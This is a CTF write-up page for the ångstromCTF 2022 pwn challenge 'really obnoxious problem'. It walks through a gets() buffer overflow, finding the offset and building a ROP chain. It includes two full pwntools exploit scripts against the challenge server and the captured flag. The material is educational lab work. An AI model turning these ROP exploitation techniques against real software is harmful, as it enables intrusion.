📖
CTF Wiki
  • 🚩Arne's CTF Writeups!
  • 2025
    • TUCTF
      • Forensics - Security Rocks
  • 2024
    • Lexington CTF
      • Misc - a little bit of tomcroppery
    • Imaginary CTF
      • Web - Journal
    • Space Heroes CTF
      • Web - Antikythera
    • HTB Cyber Apocalypse
      • Pwn - Sound of Silence
      • Misc - MultiDigilingual
  • 2023
    • NahamConCTF
      • Mobile - Red Light Green Light
    • BucketCTF
      • Rev - Schematic
      • Rev - Random security
    • HTB Cyber Apocalypse
      • Rev - Cave System
      • Rev - Somewhat Linear
      • Pwn - Void
  • 2022
    • DownUnderCTF 2022
      • Cloud - Jimmy Builds a Kite
    • Ã¥ngstromCTF 2022
      • Pwn - really obnoxious problem
      • Pwn - whatsmyname
    • Engineer CTF
      • Misc - Not really random
      • Misc - Broken Pieces
    • KnightCTF 2022
    • HTB CTF: Dirty Money
      • Forensics - Perseverance
  • 2021
    • MetaCTF CyberGames 2021
    • HTB - Cyber Santa
      • RE - Infiltration
    • Securebug CTF Thor 2021
      • Web - Tricks 1
      • Web - Tricks 2
      • RE - Hidden in Plain Sight
    • TFC CTF 2021
      • RE - Crackity
      • Pwn - Jumpy
      • Misc - Weird Friend
    • K3RN3L CTF 2021
      • Crypto - Pascal RSA
    • DamCTF 2021
      • Misc - library-of-babel
      • Pwn - cookie-monster
    • Killer Queen CTF 2021
      • Pwn - Tweety Birb
      • Forensics - Tippy Tappies
      • Pwn - I want to break free
    • BuckeyeCTF 2021
      • Web - pay2win
      • Misc - USB Exfiltration
Powered by GitBook
On this page
  • Description
  • Downloads
  • Solution
  • Bonus
  1. 2022
  2. ångstromCTF 2022

Pwn - really obnoxious problem

140 points | 234 solves

Last updated 2 years ago

Description

You know the drill.

Downloads

Solution

Didn't manage to solve this during the CTF but I should have.

The program is quite straightforward,

We have a buffer overflow in gets() because there is no boundary check. We shall use a cyclic pattern to find out what is the offset required to control rip.

msf-pattern_create -l 200 to generate the cyclic pattern:

Using gdb, we find out what is in the ret address:

msf-pattern_offset -l 200 -q 6341356341346341 to find the offset.

Now we have control over rip, it is time to find the "win" function and conveniently we have the flag() function available.

To "win", we need to pass in 2 arguments before calling the function and this can be done with a ROP chain. In Linux x64 calling convention, the function arguments are passed via rdi, rsi, rdx, rcx, r8, r9 registers.

ROPgadget --binary ./really_obnoxious_problem --ropchain to find the ROP gadgets.

We have found 2 useful gadgets, pop rdi; ret and pop rsi; pop r15; ret.

Next we want to find the address of "bobby" which we want to populate the second argument with. This can be done from Ghidra itself.

Now that we have everything we need, let's try to craft the exploit.

from pwn import *
context.log_level = 'debug'

r = remote("challs.actf.co", 31225)
#r = process("./really_obnoxious_problem")

arg1 = p64(0x1337)
arg2 = p64(0x402004)

pop_rdi = p64(0x4013f3)
pop_rsi_r15 = p64(0x4013f1)

flag = p64(0x401256)

payload = b'A' * 72
payload += pop_rdi
payload += arg1
payload += pop_rsi_r15
payload += arg2
payload += p64(0x0)
payload += flag

r.sendlineafter(b'Name: ', b'A')
r.sendlineafter(b'Address: ', payload)
r.interactive()
r.close()

Flag: actf{so_swe3t_so_c0ld_so_f4ir_7167cfa2c019}

Bonus

Instead of doing all the hard work of finding the ROP gadgets and stuff pwntools can actually do most of the heavy lifting for us.

from pwn import *

r = remote("challs.actf.co", 31225)
elf = context.binary = ELF("./really_obnoxious_problem")
context.log_level = 'debug'

offset = 72

# Create ROP object
rop = ROP(elf)

rop.flag(0x1337, next(elf.search(b'bobby')))

# Build the payload
payload = flat({
	offset: [
		rop.chain()
	]
})

# Send payload
r.sendlineafter(b'Name: ', b'A')
r.sendlineafter(b'Address: ', payload)

# Get flag
r.interactive()
r.close()
17KB
really_obnoxious_problem